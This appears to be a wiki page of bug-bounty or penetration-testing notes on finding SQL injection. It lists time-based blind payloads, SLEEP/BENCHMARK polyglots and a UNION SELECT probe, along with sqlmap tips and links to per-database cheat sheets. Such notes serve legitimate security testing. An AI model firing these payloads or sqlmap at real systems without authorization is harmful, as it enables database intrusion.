====== Tactical Fuzzing - SQLi ======

===== SQL Injection =====

Core Idea: Does the page look like it might need to call on stored data?

There exist some SQLi polyglots, i.e (Mathias Karlsson):

<code>
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
</code>

Works in single quote context, works in double quote context, works in "straight into query" context!

You can also leverage the large database of fuzzlists from Seclists (https://github.com/danielmiessler/SecLists)

===== SQL Injection Observations =====
Blind is predominant, Error based is highly unlikely.

<code>
'%2Bbenchmark(3200,SHA1(1))%2B'
</code>

<code>
'+BENCHMARK(40000000,SHA1(1337))+'
</code>

SQLMap is king!
  * Use -l to parse a Burp log file.
  * Use Tamper Scripts for blacklists.
  * SQLiPy Burp plugin works well to instrument SQLmap quickly.
Lots of injection in web services!

===== Best SQL injection resources =====

  * MySQL:
  * [[http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet|PentestMonkey's mySQL injection cheat sheet]]
  * [[https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/|Reiners mySQL injection Filter Evasion Cheatsheet]]
  * MSSQL:
  * [[http://evilsql.com/main/page2.php|EvilSQL's Error/Union/Blind MSSQL Cheatsheet]]
  * [[http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet|PentestMonkey's MSSQL SQLi injection Cheat Sheet]]
  * ORACLE:
  * [[http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet|PentestMonkey's Oracle SQLi Cheatsheet]]
  * POSTGRESQL:
  * [[http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet|PentestMonkey's Postgres SQLi Cheatsheet]]
  * Others
  * [[http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html|Access SQLi Cheatsheet]]
  * [[http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet|PentestMonkey's Ingres SQL Injection Cheat Sheet]]
  * [[http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet|Pentestmonkey's DB2 SQL Injection Cheat Sheet]]
  * [[http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet|Pentestmonkey's Informix SQL Injection Cheat Sheet]]
  * [[https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet|SQLite3 Injection Cheat sheet]]
  * [[http://rails-sqli.org/|Ruby on Rails (Active Record) SQL Injection Guide]]



===== Zseano/Drew SQLi Additions =====

**Time-based detection payloads:**
<code>
' or sleep(15) and 1=1#
' or sleep(15)#
' union select sleep(15),null#
'%2Bbenchmark(3200,SHA1(1))%2B'
</code>

**Polyglot (jhaddix):**
<code>
"SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
</code>

  * Legacy features and old code = most vulnerable targets
  * Test both GET and POST -- one method may be unprotected
  * Web services/APIs especially vulnerable
  * ''sqlmap -l burp.log --tamper=space2comment'' to parse Burp logs

  * [[zseano:sqli|Full Zseano SQLi Guide]]